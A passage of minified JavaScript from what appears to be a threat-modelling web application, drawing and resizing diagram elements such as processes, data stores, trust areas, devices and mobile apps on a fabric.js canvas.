r}r.NameChanged.subscribe(k=>this.changeObjectName(r.ID)),r.OutOfScopeChanged.subscribe(k=>this.changeObjectBorder(r.ID)),r.TypeChanged.subscribe(k=>this.changeObjectType(r.ID,k.Name)),r.PhysicalElementChanged.subscribe(k=>this.changeObjectPhysicalElement(r.ID,k));let T=null;if(n.ElementTypeID==Et.PhyProcessing||n.ElementTypeID==Et.LogProcessing?T=this.createProcessing(e-0,i-0,r):n.ElementTypeID==Et.PhyDataStore||n.ElementTypeID==Et.LogDataStore?T=this.createDataStore(e-0,i-0,r):n.ElementTypeID==Et.PhyExternalEntity||n.ElementTypeID==Et.LogExternalEntity?T=this.createExternalEntity(e-0,i-0,r):n.ElementTypeID==Et.DataFlow?T=this.createFlow(e-0,i-0,e-0+200,i-0,r):n.ElementTypeID==Et.PhyTrustArea||n.ElementTypeID==Et.LogTrustArea?T=this.createTrustArea(e-0,i-0,r):n.ElementTypeID==Et.PhysicalLink?T=this.createPhysicalLink(e-0,i-0,r):n.ElementTypeID==Et.Interface&&(T=this.createInterface(e-0,i-0,r)),null!=T)return this.Diagram.Elements.AddChild(r),this.Canvas.add(T),(n.ElementTypeID==Et.PhyTrustArea||n.ElementTypeID==Et.LogTrustArea)&&this.Canvas.sendToBack(T),this.SelectionChanged.emit(r),this.onCanvasModified(),r}getFlowAnchorPoint(a,e){if(e[ot.myType]==wt.Process){if([_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){if(a==_i.NorthEast)return[e.left+e.width-5,e.top+5];if(a==_i.NorthWest)return[e.left+5,e.top+5];if(a==_i.SouthEast)return[e.left+e.width-5,e.top+e.height-5];if(a==_i.SouthWest)return[e.left+5,e.top+e.height-5]}}else if(e[ot.myType]==wt.DataStore){if([_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){if(a==_i.NorthEast)return[e.left+e.width,e.top+7];if(a==_i.NorthWest)return[e.left,e.top+7];if(a==_i.SouthEast)return[e.left+e.width,e.top+e.height-7];if(a==_i.SouthWest)return[e.left,e.top+e.height-7]}}else if(e[ot.myType]==wt.PhysicalLink&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].includes(a)){const i=e.width/7;if(a==_i.NorthWest)return[e.left+i,e.top];if(a==_i.SouthEast)return[e.left+e.width-i,e.top+e.height]}return super.getFlowAnchorPoint(a,e)}subscribeScaling(a){switch(a[ot.myType]){case wt.DataStore:a.on("scaling",e=>this.onScaleDataStore(e));break;case wt.Process:a.on("scaling",e=>this.onScaleProcessing(e));break;case wt.ExternalEntity:a.on("scaling",e=>this.onScaleExternalEntity(e));break;case wt.PhysicalLink:a.on("scaling",e=>this.onScalePhysicalLink(e));break;case wt.Interface:a.on("scaling",e=>this.onScaleInterface(e));break;case wt.TrustArea:a.on("scaling",e=>this.onScaleTrustArea(e));break;default:[wt.Annotation,wt.TextPosPoint,wt.ElementName,wt.DataFlowLine,wt.DataFlowArrowE,wt.DataFlowCircle,wt.DataFlowPoint].includes(a[ot.myType])||console.error("Unknown type: ",a,a[ot.myType])}}getViewBaseElement(a){return this.dataService.Project.GetDFDElement(a)}getViewBaseElements(){return this.dataService.Project.GetDFDElements()}createDataStore(a,e,i){const c=new Ei.fabric.Path(this.createDataStorePath(140,75),{fill:"transparent",stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,objectCaching:!1,myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:2,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),q=[c,d,new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),T,...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(te=>{var pe;return null===(pe=q.find(Re=>Re[ot.fa]==te))||void 0===pe?void 0:pe.set(ot.visible,!1)});const Y=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.DataStore});return Y.on("scaling",te=>this.onScaleDataStore(te)),Y.setControlsVisibility({mtr:!1}),Y}createDataStorePath(a,e){return["M 0 8 L 0",(e-9).toString(),"A 10 1.3 0 0 0",a.toString(),(e-9).toString(),"L",a.toString(),"8 A 10 1.3 0 0 0 0 8 A 10 1.3 0 0 0",a.toString(),"8"].join(" ")}onScaleDataStore(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(T=>T[ot.myType]==wt.ElementBorder),n=e._objects.find(T=>T[ot.myType]==wt.ElementType),r=e.width*e.scaleX,c=e.height*e.scaleY;i.set({height:c,width:r,scaleX:1,scaleY:1,left:-r/2,top:-c/2});const d=new Ei.fabric.Path(this.createDataStorePath(r,c));i.set("path",d.path),i.set("pathOffset",{x:r/2,y:c/2}),i.setCoords(),n&&n.set({left:0,top:-c/2+2}),this.onCanvasModified()}createProcessing(a,e,i){const c=new Ei.fabric.Rect({stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,rx:15,ry:15,width:140,height:75,fill:"transparent",myType:wt.ElementBorder});let d=null,T=null;i.GetProperties().some(Re=>Re.Type==Ii.DiagramReference)&&(d=new Ei.fabric.Line([15,0,15,75],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth}),T=new Ei.fabric.Line([125,0,125,75],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth}));const k=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),q=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),Y=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),te=[c];d&&te.push(d,T),te.push(k,Y,q,...this.createFlowAnchors(140,75,!0,!0,!1,!0)),4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Re=>{var Fe;return null===(Fe=te.find(Ne=>Ne[ot.fa]==Re))||void 0===Fe?void 0:Fe.set(ot.visible,!1)});const pe=new Ei.fabric.Group(te,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:"P",subTargetCheck:!0});return pe.on("scaling",Re=>this.onScaleProcessing(Re)),pe.setControlsVisibility({mtr:!1}),pe}onScaleProcessing(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createExternalEntity(a,e,i){const c=new Ei.fabric.Rect({stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:140,height:75,fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:70,top:5,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"center",left:70,top:59,myType:wt.ElementPhyElement}),q=[c,d,new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:70,top:29.5,textAlign:"center",myType:wt.ElementName}),T,...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(te=>{var pe;return null===(pe=q.find(Re=>Re[ot.fa]==te))||void 0===pe?void 0:pe.set(ot.visible,!1)});const Y=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.ExternalEntity});return Y.on("scaling",te=>this.onScaleExternalEntity(te)),Y.setControlsVisibility({mtr:!1}),Y}onScaleExternalEntity(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(c=>c[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),this.onCanvasModified()}createPhysicalLink(a,e,i){const k=[new Ei.fabric.Polygon([{x:20,y:0},{x:140,y:0},{x:120,y:75},{x:0,y:75}],{stroke:i instanceof td?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:75,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:67,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.PhysicalLink});return q.on("scaling",Y=>this.onScalePhysicalLink(Y)),q.setControlsVisibility({mtr:!1}),q}onScalePhysicalLink(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),i.set("points",[{x:n/7,y:0},{x:n,y:0},{x:n-n/7,y:r},{x:0,y:r}]),i.set("pathOffset",{x:n/2,y:r/2}),this.onCanvasModified()}createInterface(a,e,i){const k=[new Ei.fabric.Polygon([{x:0,y:0},{x:120,y:0},{x:140,y:37.5},{x:120,y:75},{x:0,y:75},{x:20,y:37.5}],{stroke:this.StrokeColor,strokeWidth:this.StrokeWidth,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:75,top:5,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:75,top:29.5,textAlign:"center",myType:wt.ElementName}),...this.createFlowAnchors(140,75,!0,!0,!1,!0)];4==this.AnchorCount&&[_i.NorthWest,_i.NorthEast,_i.SouthEast,_i.SouthWest].forEach(Y=>{var te;return null===(te=k.find(pe=>pe[ot.fa]==Y))||void 0===te?void 0:te.set(ot.visible,!1)});const q=new Ei.fabric.Group(k,{left:a,top:e,hasControls:!0,hasBorders:!1,subTargetCheck:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.Interface});return q.on("scaling",Y=>this.onScaleInterface(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleInterface(a){this.onScaleElement(a);let e=a.transform.target,i=e._objects.find(d=>d[ot.myType]==wt.ElementBorder),n=e.width*e.scaleX,r=e.height*e.scaleY;i.set({height:r,width:n,scaleX:1,scaleY:1,left:-n/2,top:-r/2}),i.set("points",[{x:0,y:0},{x:n-n/7,y:0},{x:n,y:r/2},{x:n-n/7,y:r},{x:0,y:r},{x:n/7,y:r/2}]),i.set("pathOffset",{x:n/2,y:r/2}),this.onCanvasModified()}createTrustArea(a,e,i,n=350,r=200){const c=new Ei.fabric.Rect({stroke:i instanceof td||i instanceof zm?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:n,height:r,strokeDashArray:[10,5],fill:"transparent",myType:wt.ElementBorder}),d=new Ei.fabric.Text("\xab"+i.GetProperty("Type").GetProperty("Name")+"\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:20,myType:wt.ElementType}),T=new Ei.fabric.Text(i.PhysicalElement?i.PhysicalElement.GetProperty("Name"):"",{fontSize:this.currentFontSizeConfig.Type,fill:this.theme.Primary,originX:"left",originY:"top",left:5,top:35,myType:wt.ElementPhyElement}),k=new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"left",originY:"top",left:5,top:5,myType:wt.ElementName}),q=new Ei.fabric.Group([c,k,d,T],{left:a,top:e,hasControls:!0,hasBorders:!1,lockRotation:!0,ID:i.ID,canvasID:Fo(),elementTypeID:i.GetProperty("Type").ElementTypeID,myType:wt.TrustArea});return q.on("scaling",Y=>this.onScaleTrustArea(Y)),q.setControlsVisibility({mtr:!1}),q}onScaleTrustArea(a){this.onScaleElement(a);const e=a.transform.target,i=e._objects.find(k=>k[ot.myType]==wt.ElementBorder),n=e._objects.find(k=>k[ot.myType]==wt.ElementType),r=e._objects.find(k=>k[ot.myType]==wt.ElementPhyElement),c=e._objects.find(k=>k[ot.myType]==wt.ElementName),d=e.width*e.scaleX,T=e.height*e.scaleY;i.set({height:T,width:d,scaleX:1,scaleY:1,left:-d/2,top:-T/2}),n.set({left:-d/2+5,top:-T/2+20}),null==r||r.set({left:-d/2+5,top:-T/2+35}),c.set({left:-d/2+5,top:-T/2+5}),this.onCanvasModified()}}class R7 extends D2{constructor(a,e,i,n,r,c,d){super(a,e,i,n,r,c),this.IsContextDiagram=!1,this.IsUseCaseDiagram=!1,this.IsContextDiagram="context"==d,this.IsUseCaseDiagram="use-case"==d}CopyElement(){this.SelectedElement instanceof Ts||this.SelectedElement instanceof Bg||this.SelectedElement instanceof Ou||this.SelectedElement instanceof cf||(this.copyID=this.SelectedElement.ID)}PasteElement(){if(!this.copyID)return;const a=this.getViewBaseElement(this.copyID),e=this.getCanvasElementByID(this.copyID);if(a){const i=this.createElement({contextRef:{name:nM.ToString(a.Type)}},e.left+e.width+10,e.top);i.CopyFrom(a.Data),i.Name+="-Copy";const n=this.getCanvasElementByID(i.ID);n.set("width",e.width),n.set("height",e.height),this.fireScaling(n),this.copyID=null}}initializeCanvas(a){return!!super.initializeCanvas(a)&&(this.IsContextDiagram&&(this.dataService.Project.GetDevices().filter(e=>!(e instanceof Ts)).forEach(e=>{if(!this.getCanvasElementByID(e.ID)){let n=this.createDevice(a.clientWidth/2-100,a.clientHeight/2-100,e,!0);e.NameChanged.subscribe(r=>this.changeObjectName(e.ID)),this.Diagram.Elements.AddChild(e),this.Canvas.add(n),this.onCanvasModified()}e.DeviceInterfaceNameChanged.subscribe(n=>this.changeDeviceInterfaceVisibility(e))}),this.dataService.Project.GetMobileApps().filter(e=>!(e instanceof Ts)).forEach(e=>{if(!this.getCanvasElementByID(e.ID)){let n=this.createMobileApp(a.clientWidth/2-100,a.clientHeight/2-100,e,!0);e.NameChanged.subscribe(r=>this.changeObjectName(e.ID)),this.Diagram.Elements.AddChild(e),this.Canvas.add(n),this.onCanvasModified()}e.MobileAppInterfaceNameChanged.subscribe(n=>this.changeMobileAppInterfaceVisibility(e))})),this.dataService.Project.ContextElementsChanged.subscribe(e=>{e.Type==Ja.Removed&&this.deleteElement(e.ID)}),!0)}instantiateFlow(){return os.Instantiate(Aa.Flow,this.dataService.Project,this.dataService.Config)}getFlowAnchorPoint(a,e){if(e[ot.myType]==wt.DeviceInterface){let i=e._objects.find(n=>n[ot.myType]==wt.ElementBorder);return a==_i.North?[e.left+e.width/2+i.left+i.width/2,e.top+e.height/2+i.top]:a==_i.East?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height/2]:a==_i.South?[e.left+e.width/2+i.left+i.width/2,e.top+e.height/2+i.top+i.height]:a==_i.West?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height/2]:a==_i.NorthWest?[e.left+e.width/2+i.left,e.top+e.height/2+i.top]:a==_i.NorthEast?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top]:a==_i.SouthEast?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height]:a==_i.SouthWest?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height]:null}if(e[ot.myType]==wt.Interactor){let i=e._objects.find(r=>r[ot.myType]==wt.InteractorArms);return e._objects.find(r=>r[ot.myType]==wt.InteractorLeg1),a==_i.North?[e.left+e.width/2,e.top+5]:a==_i.East?[e.left+e.width/2+i.left+i.width,e.top+e.height/2+i.top+i.height/2]:a==_i.South?[e.left+e.width/2,e.top+e.height/2+10]:a==_i.West?[e.left+e.width/2+i.left,e.top+e.height/2+i.top+i.height/2]:null}return super.getFlowAnchorPoint(a,e)}createElement(a,e,i){if(!a.contextRef)return null;let n,r=null;if(a.contextRef.elementType==Aa.Device){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=Ts.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createDevice(e,i,n,!1)}else if("Device"==a.contextRef.name){n=this.dataService.Project.CreateDevice();const c=n;"1"==a.contextRef.type&&(c.InterfaceTop=c.InterfaceRight=c.InterfaceBottom=c.InterfaceLeft=So.None),r=this.createDevice(e,i,n,"2"==a.contextRef.type),this.NavTreeChanged.emit()}else if(a.contextRef.elementType==Aa.MobileApp){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=Ts.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createMobileApp(e,i,n,!1)}else if("App"==a.contextRef.name){n=this.dataService.Project.CreateMobileApp();const c=n;"1"==a.contextRef.type&&(c.InterfaceTop=c.InterfaceRight=c.InterfaceBottom=c.InterfaceLeft=So.None),r=this.createMobileApp(e,i,n,"2"==a.contextRef.type),this.NavTreeChanged.emit()}else if(a.contextRef.elementType==Aa.Interactor){let c=this.dataService.Project.GetContextElement(a.contextRef.elementID);n=Ts.InstantiateRef(c,this.dataService.Project,this.dataService.Config),r=this.createInteractor(e,i,n)}else"Interactor"==a.contextRef.name?(n=os.Instantiate(Aa.Interactor,this.dataService.Project,this.dataService.Config),r=this.createInteractor(e,i,n)):a.contextRef.name.startsWith("Interface")?(n=os.Instantiate(Aa.Interface,this.dataService.Project,this.dataService.Config),r=this.createInterface(e,i,n,a.contextRef.name)):"Use Case"==a.contextRef.name?(n=os.Instantiate(Aa.UseCase,this.dataService.Project,this.dataService.Config),r=this.createUseCase(e,i,n)):"External Entity"==a.contextRef.name?(n=os.Instantiate(Aa.ExternalEntity,this.dataService.Project,this.dataService.Config),r=this.createExternalEntity(e,i,n)):"Trust Area"==a.contextRef.name&&(n=os.Instantiate(Aa.TrustArea,this.dataService.Project,this.dataService.Config),r=this.createTrustArea(e,i,n));return n.NameChanged.subscribe(c=>this.changeObjectName(n.ID)),n.OutOfScopeChanged.subscribe(c=>this.changeObjectBorder(n.ID)),n.TypeChanged.subscribe(c=>this.changeObjectType(n.ID,nM.ToString(n.Type))),this.Diagram.Elements.AddChild(n),this.Canvas.add(r),"Trust Area"==a.contextRef.name&&this.Canvas.sendToBack(r),this.SelectionChanged.emit(n),this.onCanvasModified(),n}subscribeScaling(a){switch(a[ot.myType]){case wt.Device:case wt.DeviceReference:a.on("scaling",e=>this.onScaleDevice(e));break;case wt.MobileApp:a.on("scaling",e=>this.onScaleMobileApp(e));break;case wt.Interactor:a.on("scaling",e=>this.onScaleInteractor(e));break;case wt.SystemUseCase:a.on("scaling",e=>this.onScaleUseCase(e));break;case wt.DeviceInterface:a.on("scaling",e=>this.onScaleInterface(e));break;case wt.SystemExternalEntity:a.on("scaling",e=>this.onScaleExternalEntity(e));break;case wt.TrustArea:a.on("scaling",e=>this.onScaleTrustArea(e));break;default:[wt.Annotation,wt.TextPosPoint,wt.ElementName,wt.DataFlowLine,wt.DataFlowArrowE,wt.DataFlowCircle,wt.DataFlowPoint].includes(a[ot.myType])||console.error("Unknown type: ",a,a[ot.myType])}}getViewBaseElement(a){return this.Diagram.Elements.GetChildrenFlat().find(e=>e.ID==a)}getViewBaseElements(){return this.Diagram.Elements.GetChildrenFlat()}createDevice(a,e,i,n){let r=200,c=200;this.IsUseCaseDiagram&&(r=250,c=350);const d=i instanceof Ts,Y=[new Ei.fabric.Rect({stroke:d?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:r,height:c,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabDevice\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:25,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:r/2,top:d?5:c/2-8,textAlign:"center",myType:wt.ElementName})],te=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:20,top:c/2,myType:wt.DeviceLabel1}),pe=new Ei.fabric.Line([20,0,20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel1Line}),Re=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:c-16,myType:wt.DeviceLabel2}),Fe=new Ei.fabric.Line([0,c-20,r,c-20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel2Line}),Ne=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:r,top:c/2,myType:wt.DeviceLabel3}),et=new Ei.fabric.Line([r-20,0,r-20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel3Line}),ut=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:5,myType:wt.DeviceLabel4}),Ze=new Ei.fabric.Line([0,20,r,20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.DeviceLabel4Line});let yt=null;i instanceof Ou?yt=i:d&&i.Ref instanceof Ou&&(yt=i.Ref),n&&yt.DeviceInterfaceNameChanged.subscribe(St=>this.changeDeviceInterfaceVisibility(yt)),Y.push(te,pe,Re,Fe,Ne,et,ut,Ze),Y.push(...this.createFlowAnchors(r,c,!0,!0,!0,!0));const It=new Ei.fabric.Group(Y,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:d?wt.DeviceReference:wt.Device,subTargetCheck:!0});return It.on("scaling",St=>this.onScaleDevice(St)),this.changeDeviceInterfaceVisibility(yt,It,!n),It.setControlsVisibility({mtr:!1}),It}onScaleDevice(a){this.onScaleElement(a);const e=a.transform.target,i=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementBorder),n=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementName),r=e._objects.find(Ne=>Ne[ot.myType]==wt.ElementType),c=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel1),d=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel1Line),T=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel2),k=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel2Line),q=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel3),Y=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel3Line),te=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel4),pe=e._objects.find(Ne=>Ne[ot.myType]==wt.DeviceLabel4Line);let Re=e.width*e.scaleX,Fe=e.height*e.scaleY;i.set({height:Fe,width:Re,scaleX:1,scaleY:1,left:-Re/2,top:-Fe/2}),e[ot.myType]==wt.DeviceReference&&n.set({left:0,top:-Fe/2+5}),null==r||r.set({left:0,top:-Fe/2+25}),null==c||c.set({left:-Re/2+20,top:0}),null==d||d.set({left:-Re/2+20,top:-Fe/2,height:Fe}),null==T||T.set({left:0,top:Fe/2-16}),null==k||k.set({left:-Re/2,top:Fe/2-20,width:Re}),null==q||q.set({left:Re/2,top:0}),null==Y||Y.set({left:Re/2-20,top:-Fe/2,height:Fe}),null==te||te.set({left:0,top:-Fe/2+5}),null==pe||pe.set({left:-Re/2,top:-Fe/2+20,width:Re}),this.onCanvasModified()}changeDeviceInterfaceVisibility(a,e,i=!1){if(null==e&&(e=this.getCanvasElementByID(a.ID)),e){let n=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel1),r=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel1Line),c=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel2),d=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel2Line),T=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel3),k=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel3Line),q=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel4),Y=e._objects.find(te=>te[ot.myType]==wt.DeviceLabel4Line);n.set("text",this.translate.instant(a.InterfaceLeft)),n.set(ot.visible,a.InterfaceLeft!=So.None&&!i),r.set(ot.visible,a.InterfaceLeft!=So.None&&!i),c.set("text",this.translate.instant(a.InterfaceBottom)),c.set(ot.visible,a.InterfaceBottom!=So.None&&!i),d.set(ot.visible,a.InterfaceBottom!=So.None&&!i),T.set("text",this.translate.instant(a.InterfaceRight)),T.set(ot.visible,a.InterfaceRight!=So.None&&!i),k.set(ot.visible,a.InterfaceRight!=So.None&&!i),null==q||q.set("text",this.translate.instant(a.InterfaceTop)),null==q||q.set(ot.visible,a.InterfaceTop!=So.None&&!i),null==Y||Y.set(ot.visible,a.InterfaceTop!=So.None&&!i),this.Canvas.requestRenderAll()}}createMobileApp(a,e,i,n){let r=200,c=200;this.IsUseCaseDiagram&&(r=250,c=350);let q=[new Ei.fabric.Rect({stroke:i instanceof Ts?this.theme.Primary:this.StrokeColor,strokeWidth:this.StrokeWidth,width:r,height:c,fill:"transparent",myType:wt.ElementBorder}),new Ei.fabric.Text("\xabApp\xbb",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:25,myType:wt.ElementType}),new Ei.fabric.Text(i.GetProperty("Name"),{fontSize:this.currentFontSizeConfig.Name,fill:this.StrokeColor,originX:"center",left:r/2,top:c/2-8,textAlign:"center",myType:wt.ElementName})],Y=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:20,top:c/2,myType:wt.AppLabel1}),te=new Ei.fabric.Line([20,0,20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel1Line}),pe=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:c-16,myType:wt.AppLabel2}),Re=new Ei.fabric.Line([0,c-20,r,c-20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel2Line}),Fe=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,angle:90,originX:"center",left:r,top:c/2,myType:wt.AppLabel3}),Ne=new Ei.fabric.Line([r-20,0,r-20,c],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel3Line}),et=new Ei.fabric.Text("",{fontSize:this.currentFontSizeConfig.Type,fill:this.StrokeColor,originX:"center",left:r/2,top:5,myType:wt.AppLabel4}),ut=new Ei.fabric.Line([0,20,r,20],{stroke:this.StrokeColor,strokeWidth:1,myType:wt.AppLabel4Line}),Ze=null;i instanceof cf?Ze=i:i instanceof Ts&&i.Ref instanceof cf&&(Ze=i.Ref),n&&Ze.MobileAppInterfaceNameChanged.subscribe(It=>this.changeMobileAppInterfaceVisibility(Ze)),q.push(Y,te,pe,Re,Fe,Ne,et,ut),q.push(...this.createFlowAnchors(r,c,!0,!0,!0,!0));let yt=new Ei.fabric.Group(q,{left:a,top:e,hasControls:!0,lockRotation:!0,lockScalingX:!1,lockScalingY:!1,hasBorders:!1,ID:i.ID,canvasID:Fo(),myType:wt.MobileApp,subTargetCheck:!0});return yt.on("scaling",It=>this.onScaleMobileApp(It)),this.changeMobileAppInterfaceVisibility(Ze,yt,!n),yt.setControlsVisibility({mtr:!1}),yt}onScaleMobileApp(a){this.onScaleElement(a);let 